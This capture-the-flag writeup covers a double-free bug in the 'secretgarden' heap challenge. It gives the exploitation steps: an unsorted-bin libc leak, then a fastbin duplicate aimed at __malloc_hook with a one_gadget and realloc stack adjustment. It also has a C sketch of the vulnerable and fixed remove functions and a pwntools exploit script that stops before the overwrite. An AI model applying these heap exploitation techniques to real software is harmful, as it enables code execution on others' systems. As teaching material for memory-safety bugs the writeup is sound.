hitcontraining_secretgarden (double free)
This challenge requires a double free and a fastbin attack: after a flower is deleted its pointer is not set to NULL, so the same flower can be deleted more than once.
The exploitation idea is as follows:
- Allocate four flowers. The name of flower[0] must have a size in the unsorted bin range; the names of flowers 1 and 2 must have a size in the fastbin range.
- Delete flower[0] (its name chunk now goes into the unsorted bin) and run the clean operation (if clean is not run, the unsorted bin chunk gets split and the same chunk cannot be obtained again later).
- Allocate a flower of the same size as flower 0 with content 8*'a'; running show now leaks the address main_arena+0x58.
- Perform the double free: delete(1), delete(2), delete(1). Then allocate one flower of the same size with content malloc_hook-0x23, and then allocate two more flowers of the same size.
- Allocate one more flower of the same size with the payload 'a'*(0x13-8) + p64(one_gadget) + p64(realloc+0x10). None of the one_gadgets in this challenge can be used directly, so realloc is used to adjust the stack.
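To make the root cause concrete, here is an added C sketch (not the challenge's source; the flower record layout and the function names are assumed) of the remove operation as the writeup describes it, beside a hardened version that refuses a repeated removal and clears the stale name pointer:

```c
#include <stdlib.h>
#include <string.h>
#define MAX_FLOWERS 100
/* Hypothetical flower record; the real binary's layout is not reproduced here. */
struct flower {
    int in_use;
    char *name;
    char color[24];
};
static struct flower *garden[MAX_FLOWERS];

/* "Raise" a flower whose name lives in its own heap chunk of name_len bytes. */
int add_flower(int idx, size_t name_len, const char *name, const char *color) {
    if (idx < 0 || idx >= MAX_FLOWERS || garden[idx] != NULL || name_len == 0) return -1;
    struct flower *f = calloc(1, sizeof *f);
    if (f == NULL) return -1;
    f->name = malloc(name_len);
    if (f->name == NULL) { free(f); return -1; }
    strncpy(f->name, name, name_len - 1);
    f->name[name_len - 1] = '\0';
    strncpy(f->color, color, sizeof f->color - 1);
    f->in_use = 1;
    garden[idx] = f;
    return 0;
}

/* The bug the writeup relies on: the name chunk is freed but the pointer stays in
 * the record, so removing the same index again calls free() on the same chunk. */
int remove_flower_vuln(int idx) {
    if (idx < 0 || idx >= MAX_FLOWERS || garden[idx] == NULL) return -1;
    garden[idx]->in_use = 0;
    free(garden[idx]->name);            /* dangling pointer left behind */
    return 0;
}

/* Hardened version: reject a flower that is already removed and clear the pointer,
 * so a repeated removal never reaches free() with the stale chunk address. */
int remove_flower_fixed(int idx) {
    if (idx < 0 || idx >= MAX_FLOWERS || garden[idx] == NULL) return -1;
    if (!garden[idx]->in_use) return -1;
    garden[idx]->in_use = 0;
    free(garden[idx]->name);
    garden[idx]->name = NULL;
    return 0;
}

/* Test helper: is slot idx a removed flower whose name pointer was never cleared? */
int name_is_dangling(int idx) {
    return garden[idx] != NULL && !garden[idx]->in_use && garden[idx]->name != NULL;
}
```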
Exp:

```python
# Python 2 / pwntools exploit script for the challenge.
from pwn import *
from LibcSearcher import *

#r = remote("node3.buuoj.cn", 27261)
r = process("./hitcontraining_secretgarden")
context.log_level = 'debug'

DEBUG = 0
if DEBUG:
    gdb.attach(r, '''
    b *0x400EAA
    c
    ''')

elf = ELF("./hitcontraining_secretgarden")
libc = ELF('./libc/libc-2.23.so')
magic = elf.sym['magic']
fakechunk = 0x601ffa

# Menu helpers: 1 = raise a flower, 2 = show, 3 = remove, 4 = clean
def add(size, content, color):
    print r.recvuntil("Your choice : ")
    r.sendline('1')
    print r.recvuntil("Length of the name :")
    r.sendline(str(size))
    print r.recvuntil("The name of flower :")
    r.send(content)
    print r.recvuntil("The color of the flower :")
    r.send(color)

def show():
    print r.recvuntil("Your choice : ")
    r.sendline('2')

def delete(index):
    print r.recvuntil("Your choice : ")
    r.sendline('3')
    print r.recvuntil("Which flower do you want to remove from the garden:")
    r.sendline(str(index))

def clean():
    print r.recvuntil("Your choice : ")
    r.sendline('4')

# flower 0: name in the unsorted-bin range; flowers 1-3: fastbin-sized names
add(0x98, 'a\n', 'a\n')  # 0
add(0x68, 'b\n', 'b\n')  # 1
add(0x68, 'b\n', 'b\n')  # 2
add(0x68, 'b\n', 'b\n')  # 3

# Free the name of flower 0 into the unsorted bin, then clean so the chunk
# is handed back whole instead of being split.
delete(0)
clean()

# Same-size allocation gets the same chunk; 'a' * 8 overwrites fd, bk stays
# and is printed right after the 8 'a's by show().
add(0x98, 'a' * 8, '1234\n')
show()
r.recvuntil('a'*8)
# bk = main_arena+0x58; __malloc_hook sits 0x10 below main_arena
malloc_hook = u64(r.recvuntil('\x7f').ljust(8, '\x00')) - 0x58 - 0x10
success("malloc_hook:"+hex(malloc_hook))
libc_base = malloc_hook - libc.sym['__malloc_hook']
realloc = libc_base
```